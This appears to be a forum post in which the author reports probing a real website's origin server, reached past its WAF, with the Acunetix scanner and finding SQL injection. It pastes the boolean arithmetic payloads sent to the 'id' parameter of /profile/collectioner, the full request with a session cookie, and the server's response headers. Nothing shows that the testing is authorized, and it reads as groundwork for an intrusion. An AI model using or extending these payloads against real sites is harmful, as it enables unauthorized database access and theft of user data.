I found the host's IP, there is no WAF. I scanned the host with Acunetix, and it found an SQLi:
Code:
URL encoded GET input id was set to 11/(3*2-5)
Tests performed:
1*11 => TRUE
11*209*204*0 => FALSE
(225-209-5) => TRUE
11/1 => TRUE
11/0 => FALSE
11/(3*2-5) => TRUE
Original value: 11
HTTP Request
Code:
GET /profile/collectioner?id=11/(3*2-5) HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://<host ip>/
Cookie: PHPSESSID=10224f7f7ca146d8b5c21b6c0fa9f22f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: <host ip>
Connection: Keep-alive
HTTP Response
Code:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Mar 2023 10:10:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.2.34
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 38892